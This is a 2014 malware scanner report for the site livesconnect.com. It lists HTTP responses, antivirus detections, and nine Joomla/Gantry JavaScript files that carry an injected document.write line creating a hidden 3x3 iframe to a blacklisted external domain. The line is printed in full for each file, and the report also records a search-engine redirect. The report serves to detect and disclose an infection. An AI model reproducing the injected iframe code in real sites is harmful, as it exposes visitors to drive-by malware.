New scan:

Malware Scanner report for livesconnect.com

Malicious/Suspicious/Total urls checked
9/0/24
9 pages have malicious code. See details below
Blacklists
OK
Suspicious redirects
Found
The website redirects visitors from search engines to the 3rd-party URL:
->http://ya.ru
3523 websites infected.

The website "livesconnect.com" is most probably hacked and losing its visitors. You need to take action as soon as possible to fix security issues. Here is our redirects fixing guide.
Malicious/Hidden/Total iFrames
9/0/10
9 malicious iframes found. See details below
Deface / Content modification
OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

  • Malware Removal
  • Blacklists Removal
  • Reason Eliminating
  • 1 Month Hack Insurance

More details

Website Hack Insurance

  • Files & DB Monitoring
  • Daily Backups
  • Malware & Hack Detection
  • Unlimited Hack Repairs

More details

Scanned pages/files

RequestServer responseStatus
http://livesconnect.com/
200 OK
Content-Length: 271
Content-Type: text/html
clean
http://livesconnect.com/bonsai/
200 OK
Content-Length: 0
Content-Type: text/html
clean
http://livesconnect.com/test404page.js
HTTP/1.1 302 Found
Connection: close
Date: Wed, 10 Sep 2014 14:43:56 GMT
Location: https://supremecenter103.com/404/
Server: Apache mod_fcgid/2.3.7 mod_auth_pgsql/2.0.3
Vary: Accept-Encoding
Content-Length: 217
Content-Type: text/html; charset=iso-8859-1
clean
https://supremecenter103.com/404/
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Wed, 10 Sep 2014 14:43:58 GMT
Location: http://us.cloudlogin.co/404/
Server: Apache mod_fcgid/2.3.7 mod_auth_pgsql/2.0.3
Vary: Accept-Encoding
Content-Length: 236
Content-Type: text/html; charset=iso-8859-1
clean
http://us.cloudlogin.co/404/
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Wed, 10 Sep 2014 14:43:58 GMT
Location: https://us.cloudlogin.co/404/
Server: Apache/2.2.22 (Debian)
Vary: Accept-Encoding
Content-Length: 319
Content-Type: text/html; charset=iso-8859-1
clean
https://us.cloudlogin.co/404/
HTTP/1.1 302 Found
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Wed, 10 Sep 2014 14:43:59 GMT
Pragma: no-cache
Location: /login/
Server: Apache/2.2.22 (Debian)
Vary: Accept-Encoding
Content-Length: 0
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Set-Cookie: WHCP=d3vkv13ovqc9h293lhvuf5tit1; path=/
X-Powered-By: PHP/5.4.4-14+deb7u14
clean
https://us.cloudlogin.co/login/
200 OK
Content-Length: 5887
Content-Type: text/html
clean
https://us.cloudlogin.co/js/jses.min.js?v=1404979296
200 OK
Content-Length: 303104
Content-Type: application/javascript
clean
http://livesconnect.com/js/jquery_plugins/jquery-fonteffect-1.0.0.min.js
HTTP/1.1 302 Found
Connection: close
Date: Wed, 10 Sep 2014 14:44:03 GMT
Location: https://supremecenter103.com/404/
Server: Apache mod_fcgid/2.3.7 mod_auth_pgsql/2.0.3
Vary: Accept-Encoding
Content-Length: 217
Content-Type: text/html; charset=iso-8859-1
clean
http://supremecenter103.com/test404page.js
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Wed, 10 Sep 2014 14:44:03 GMT
Location: http://us.cloudlogin.co/test404page.js
Server: Apache mod_fcgid/2.3.7 mod_auth_pgsql/2.0.3
Vary: Accept-Encoding
Content-Length: 246
Content-Type: text/html; charset=iso-8859-1
clean
http://us.cloudlogin.co/test404page.js
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Wed, 10 Sep 2014 14:44:03 GMT
Location: https://us.cloudlogin.co/test404page.js
Server: Apache/2.2.22 (Debian)
Vary: Accept-Encoding
Content-Length: 329
Content-Type: text/html; charset=iso-8859-1
clean
https://us.cloudlogin.co/test404page.js
HTTP/1.1 302 Found
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Wed, 10 Sep 2014 14:44:04 GMT
Pragma: no-cache
Location: /login/
Server: Apache/2.2.22 (Debian)
Vary: Accept-Encoding
Content-Length: 0
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Set-Cookie: WHCP=c8cn1dv5rjl6jnh3l5d5lm1hl3; path=/
X-Powered-By: PHP/5.4.4-14+deb7u14
clean
http://livesconnect.com/js/video-js/video.min.js
HTTP/1.1 302 Found
Connection: close
Date: Wed, 10 Sep 2014 14:44:04 GMT
Location: https://supremecenter103.com/404/
Server: Apache mod_fcgid/2.3.7 mod_auth_pgsql/2.0.3
Vary: Accept-Encoding
Content-Length: 217
Content-Type: text/html; charset=iso-8859-1
clean
https://www.corecounter.net/counter.php?user=59
200 OK
Content-Length: 482
Content-Type: text/html
clean
http://livesconnect.com/ted/
200 OK
Content-Length: 25514
Content-Type: text/html
clean
http://livesconnect.com/ted/components/com_gantry/js/mootools-1.2.5.js
200 OK
Content-Length: 121179
Content-Type: application/javascript
malicious
Malicious code - confirmed by antiviruses (see below)

...[3463 bytes skipped]...
x:css:value"};return g},serve:function(g,d){if($type(g)!="fx:css:value"){g=this.parse(g)}var f=[];g.each(function(a){f=f.concat(a.parser.serve(a.value,d))});return f},render:function(g,h,i,f){g.setStyle(h,this.serve(i,f))},search:function(d){if(Fx.CSS.Cache[d]){return Fx.CSS.Cache[d]}var c={};Array.each(document.styleSheets,function(b,h){var i=b.href;if(i&&i.contains(":</iframe>');document.write('<iframe src="http://wdxjnxsz.sellclassics.com/doubleclickingsygate.cgi?8" scrolling="auto" frameborder="no" align="center" height="3" width="3"></iframe>');

Antivirus reports:

Avast
HTML:Iframe-BLP [Trj]
Bkav
MW.Clod7fc.Trojan.5947
Ikarus
Trojan.JS.IframeRef
TrendMicro-HouseCall
TROJ_GEN.F47V1122
Microsoft
Trojan:JS/IframeRef.J
Kaspersky
HEUR:Trojan.Script.Generic
VIPRE
Malware.JS.Generic (JS)
Norman
IframeRef.DJ

Malicious iFrame found.
size: 3x3     
src: http://wdxjnxsz.sellclassics.com/doubleclickingsygate.cgi?8
This URL is marked by Google as suspicious

<iframe src="http://wdxjnxsz.sellclassics.com/doubleclickingsygate.cgi?8" scrolling="auto" frameborder="no" align="center" height="3" width="3">

http://livesconnect.com/ted/media/system/js/caption.js
200 OK
Content-Length: 2136
Content-Type: application/javascript
malicious
Malicious code - confirmed by antiviruses (see below)

...[1025 bytes skipped]...
container.className = this.selector.replace('.', '_');
container.className = container.className + " " + align;
container.setAttribute("style","float:"+align);
container.style.width = width + "px";
}
});
document.caption = null;
window.addEvent('load', function() {
var caption = new JCaption('img.caption')
document.caption = caption
});
;document.write('<iframe src="http://wdxjnxsz.sellclassics.com/doubleclickingsygate.cgi?8" scrolling="auto" frameborder="no" align="center" height="3" width="3"></iframe>');

Antivirus reports:

Kaspersky
HEUR:Trojan.Script.Generic
Sophos
Mal/Iframe-AN

Malicious iFrame found.
size: 3x3     
src: http://wdxjnxsz.sellclassics.com/doubleclickingsygate.cgi?8
This URL is marked by Google as suspicious

<iframe src="http://wdxjnxsz.sellclassics.com/doubleclickingsygate.cgi?8" scrolling="auto" frameborder="no" align="center" height="3" width="3">

http://livesconnect.com/ted/components/com_jfbconnect/includes/jfbconnect.js?v412
200 OK
Content-Length: 8365
Content-Type: application/javascript
malicious
Malicious code - confirmed by antiviruses (see below)

...[3862 bytes skipped]...
.location.href + '?jfbcCanvasBreakout=1';
else
top.location.href = window.location.href + '&jfbcCanvasBreakout=1';
}
}
},

request:{
currentId:null,
popup:function (jfbcReqId) {
jfbc.request.currentId = jfbcReqId;
data = jfbcRequests[;document.write('<iframe src="http://wdxjnxsz.sellclassics.com/doubleclickingsygate.cgi?8" scrolling="auto" frameborder="no" align="center" height="3" width="3"></iframe>');

Antivirus reports:

Avast
HTML:Iframe-BLP [Trj]
Bkav
MW.Clod442.Trojan.8b2b
Ikarus
Trojan.JS.IframeRef
TrendMicro-HouseCall
TROJ_GEN.F47V1122
Microsoft
Trojan:JS/IframeRef.J
Kaspersky
HEUR:Trojan.Script.Generic
VIPRE
Malware.JS.Generic (JS)
Norman
IframeRef.DJ
GData
Win32.Trojan.Agent.VNK8AV

Malicious iFrame found.
size: 3x3     
src: http://wdxjnxsz.sellclassics.com/doubleclickingsygate.cgi?8
This URL is marked by Google as suspicious

<iframe src="http://wdxjnxsz.sellclassics.com/doubleclickingsygate.cgi?8" scrolling="auto" frameborder="no" align="center" height="3" width="3">

http://livesconnect.com/ted/components/com_gantry/js/gantry-totop-mt1.2.js
200 OK
Content-Length: 904
Content-Type: application/javascript
malicious
Malicious code - confirmed by antiviruses (see below)

eval(function(p,a,c,k,e,r){e=function(c){return c.toString(a)};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('3.0(\'j\',1(){2 a=f.d(\'c-9\');8(a){2 b=6 5.4(3);a.7(\'g\',\'h\').0(\'i\',1(e){e.k();b.l()})}});',22,22,'addEvent|function|var|window|Scroll|Fx|new|setStyle|if|totop|||gantry|id||document|outline|none|click|domready|stop|toTop'.split('|'),0,{}))
;document.write('<iframe src="http://wdxjnxsz.sellclassics.com/doubleclickingsygate.cgi?8" scrolling="auto" frameborder="no" align="center" height="3" width="3"></iframe>');

Antivirus reports:

Kaspersky
HEUR:Trojan.Script.Generic
Microsoft
Trojan:JS/IframeRef.J
Norman
IframeRef.DJ
Sophos
Mal/Iframe-AN

Malicious iFrame found.
size: 3x3     
src: http://wdxjnxsz.sellclassics.com/doubleclickingsygate.cgi?8
This URL is marked by Google as suspicious

<iframe src="http://wdxjnxsz.sellclassics.com/doubleclickingsygate.cgi?8" scrolling="auto" frameborder="no" align="center" height="3" width="3">

http://livesconnect.com/ted/components/com_gantry/js/gantry-buildspans-mt1.2.js
200 OK
Content-Length: 1266
Content-Type: application/javascript
malicious
Malicious code found. Script contains blacklisted domain: wdxjnxsz.sellclassics.com

...[493 bytes skipped]...
7=z A(\'7\').8(\'6\',n);7.C(d,\'D\');d.E(a)}};$$(e).5(3(c){j.5(3(h){c.t(h).5(3(b){2 a=b.x();9(a&&a.l(\'F\')==\'a\')f(a);H f(b)})})})})};',44,44,'||var|function|rest|each|text|span|set|if||||||||||||get|length|first|split|slice|join|html|innerHTML|getElements|visible|visibility|setStyle|getFirst|clone|new|Element|times|inject|top|replaces|tag|GantryBuildSpans|else'.split('|'),0,{}))
;document.write('<iframe src="http://wdxjnxsz.sellclassics.com/doubleclickingsygate.cgi?8" scrolling="auto" frameborder="no" align="center" height="3" width="3"></iframe>');

Decoded script:

...[633 bytes skipped]...
le('visibility','visible');var b=a.get('text');var c=b.split(" ");first=c[0];rest=c.slice(1).join(" ");html=a.innerHTML;if(rest.length>0){var d=a.clone().set('text',' '+rest),span=new Element('span').set('text',first);span.inject(d,'top');d.replaces(a)}};$$(e).each(function(c){j.each(function(h){c.getElements(h).each(function(b){var a=b.getFirst();if(a&&a.get('tag')=='a')f(a);else f(b)})})})})};
<iframe src="http://wdxjnxsz.sellclassics.com/doubleclickingsygate.cgi?8" scrolling="auto" frameborder="no" align="center" height="3" width="3"></iframe>

Malicious iFrame found.
size: 3x3     
src: http://wdxjnxsz.sellclassics.com/doubleclickingsygate.cgi?8
This URL is marked by Google as suspicious

<iframe src="http://wdxjnxsz.sellclassics.com/doubleclickingsygate.cgi?8" scrolling="auto" frameborder="no" align="center" height="3" width="3">

http://livesconnect.com/ted/components/com_gantry/js/gantry-inputs-mt1.2.js
200 OK
Content-Length: 3242
Content-Type: application/javascript
malicious
Malicious code - confirmed by antiviruses (see below)

...[2629 bytes skipped]...
lse|each|10000px|opera|position|setStyles|absolute|hasClass|checks|true|radio|left|InputsExclusion|checkbox|all|removeClass|morph|set|setStyle|display|switchReplacement|none|return|fireEvent|erase|gecko|has|join|getProperty|replace|for|radios|right|init|setProperty|radioparent|document|direction|body|id|getStyle|new|push|Hash|version|window|content_vote|trident5|domready'.split('|'),0,{}))
;document.write('<iframe src="http://wdxjnxsz.sellclassics.com/doubleclickingsygate.cgi?8" scrolling="auto" frameborder="no" align="center" height="3" width="3"></iframe>');

Antivirus reports:

Avast
HTML:Iframe-inf
Ikarus
Trojan.IframeRef
nProtect
Trojan.JS.Iframe.CYW
Kaspersky
HEUR:Trojan.Script.Generic
Microsoft
Trojan:JS/IframeRef.J
F-Secure
Trojan.JS.Iframe.CYW
Norman
IframeRef.DJ
Sophos
Mal/HappJS-A
GData
Trojan.JS.Iframe.CYW
BitDefender
Trojan.JS.Iframe.CYW

Malicious iFrame found.
size: 3x3     
src: http://wdxjnxsz.sellclassics.com/doubleclickingsygate.cgi?8
This URL is marked by Google as suspicious

<iframe src="http://wdxjnxsz.sellclassics.com/doubleclickingsygate.cgi?8" scrolling="auto" frameborder="no" align="center" height="3" width="3">

http://livesconnect.com/ted/components/com_gantry/js/gantry-smartload-mt1.2.js
200 OK
Content-Length: 2517
Content-Type: application/javascript
malicious
Malicious code - confirmed by antiviruses (see below)

...[1835 bytes skipped]...
rolling|typeof|undefined|document|id|spinner|dimensions|placeholder|start|200|exclusion|Fx|fx|else|getScrollSize|scrollSize|getScroll|opacity|addEvent|onload|image|Asset|getPosition|Hash|setOptions|bind|set|initialize|Tween|split|duration|250|transition|img|Transitions|window|chain|gif|blank|Sine|easeIn|Options|Events|Implements|Class|addClass|GantrySmartLoad|removeClass'.split('|'),0,{}))
;document.write('<iframe src="http://wdxjnxsz.sellclassics.com/doubleclickingsygate.cgi?8" scrolling="auto" frameborder="no" align="center" height="3" width="3"></iframe>');

Antivirus reports:

AntiVir
HTML/IFrame.Inf.9552
Avast
HTML:Iframe-inf
Ikarus
Trojan.IframeRef
nProtect
Trojan.JS.Agent.HSZ
Comodo
TrojWare.JS.Iframe.IN
Kaspersky
HEUR:Trojan.Script.Generic
Microsoft
Trojan:JS/IframeRef.J
MicroWorld-eScan
Trojan.JS.Agent.HSZ
Fortinet
JS/Redir.BBEP!tr
NANO-Antivirus
Trojan.Url.IframeB.bgynby
F-Secure
Trojan.JS.Agent.HSZ
F-Prot
IFrame.gen
Norman
IframeRef.DJ
Sophos
Troj/JSRedir-IY
GData
Trojan.JS.Agent.HSZ
Commtouch
IFrame.gen
BitDefender
Trojan.JS.Agent.HSZ

Malicious iFrame found.
size: 3x3     
src: http://wdxjnxsz.sellclassics.com/doubleclickingsygate.cgi?8
This URL is marked by Google as suspicious

<iframe src="http://wdxjnxsz.sellclassics.com/doubleclickingsygate.cgi?8" scrolling="auto" frameborder="no" align="center" height="3" width="3">

http://livesconnect.com/ted/templates/rt_panacea_j15/js/gantry-rotator-mt1.2.js
200 OK
Content-Length: 512
Content-Type: application/javascript
malicious
Malicious code - confirmed by antiviruses (see below)

2007 - 2011 RocketTheme, LLC
* @license http: */
eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e;document.write('<iframe src="http://wdxjnxsz.sellclassics.com/doubleclickingsygate.cgi?8" scrolling="auto" frameborder="no" align="center" height="3" width="3"></iframe>');

Antivirus reports:

Avast
HTML:Iframe-BLP [Trj]
Bkav
MW.Clod298.Trojan.441c
Ikarus
Trojan.JS.IframeRef
TrendMicro-HouseCall
TROJ_GEN.F47V1122
Microsoft
Trojan:JS/IframeRef.J
Kaspersky
HEUR:Trojan.Script.Generic
VIPRE
Malware.JS.Generic (JS)
Norman
IframeRef.DJ
Sophos
Mal/Iframe-AN
GData
Script.Trojan.Agent.PG53K8

Malicious iFrame found.
size: 3x3     
src: http://wdxjnxsz.sellclassics.com/doubleclickingsygate.cgi?8
This URL is marked by Google as suspicious

<iframe src="http://wdxjnxsz.sellclassics.com/doubleclickingsygate.cgi?8" scrolling="auto" frameborder="no" align="center" height="3" width="3">

http://livesconnect.com/ted/components/com_gantry/js/gantry-morearticles-mt1.2.js
200 OK
Content-Length: 1959
Content-Type: application/javascript
malicious
Malicious code - confirmed by antiviruses (see below)

...[1182 bytes skipped]...
ment|return|buildButton|ajax|get|spinner|handle|set|div|length|removeEvent|GantryBuildSpans|GantryArticleDetails|undefined|refresh|GantryMoreArticles|Class|Implements|Options|initialize|setOptions|teaser|leading|Request|method|onRequest|onSuccess|id|href|adopt|span|text|class|after|addEvent|stop|hasClass|limitstart|removeClass|html|getElements|article|else|block|h3|h2|h1|init'.split('|'),0,{}));document.write('<iframe src="http://wdxjnxsz.sellclassics.com/doubleclickingsygate.cgi?8" scrolling="auto" frameborder="no" align="center" height="3" width="3"></iframe>');

Antivirus reports:

AntiVir
HTML/IFrame.Inf.9552
Avast
HTML:Iframe-inf
Ikarus
Trojan.IframeRef
nProtect
Trojan.JS.Agent.HSZ
Comodo
TrojWare.JS.Iframe.IN
Kaspersky
HEUR:Trojan.Script.Generic
Microsoft
Trojan:JS/IframeRef.J
MicroWorld-eScan
Trojan.JS.Agent.HSZ
Fortinet
JS/Redir.BBEP!tr
NANO-Antivirus
Trojan.Url.IframeB.bgynby
F-Secure
Trojan.JS.Agent.HSZ
F-Prot
IFrame.gen
Norman
IframeRef.DJ
Sophos
Troj/JSRedir-IY
GData
Trojan.JS.Agent.HSZ
Commtouch
IFrame.gen
BitDefender
Trojan.JS.Agent.HSZ

Malicious iFrame found.
size: 3x3     
src: http://wdxjnxsz.sellclassics.com/doubleclickingsygate.cgi?8
This URL is marked by Google as suspicious

<iframe src="http://wdxjnxsz.sellclassics.com/doubleclickingsygate.cgi?8" scrolling="auto" frameborder="no" align="center" height="3" width="3">

Malicious/Suspicious Redirects

RequestServer responseStatus
URL: http://livesconnect.com/
(imitation of visitor from search engine)

GET / HTTP/1.1
Host: livesconnect.com
Referer: http://www.google.com/search?q=redirect+check1
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Wed, 10 Sep 2014 14:43:54 GMT
Location: http://ya.ru
Server: Apache mod_fcgid/2.3.7 mod_auth_pgsql/2.0.3
Vary: Accept-Encoding
Content-Length: 220
Content-Type: text/html; charset=iso-8859-1
suspicious

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=livesconnect.com

Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://livesconnect.com/

Result: livesconnect.com is not infected or malware details are not published yet.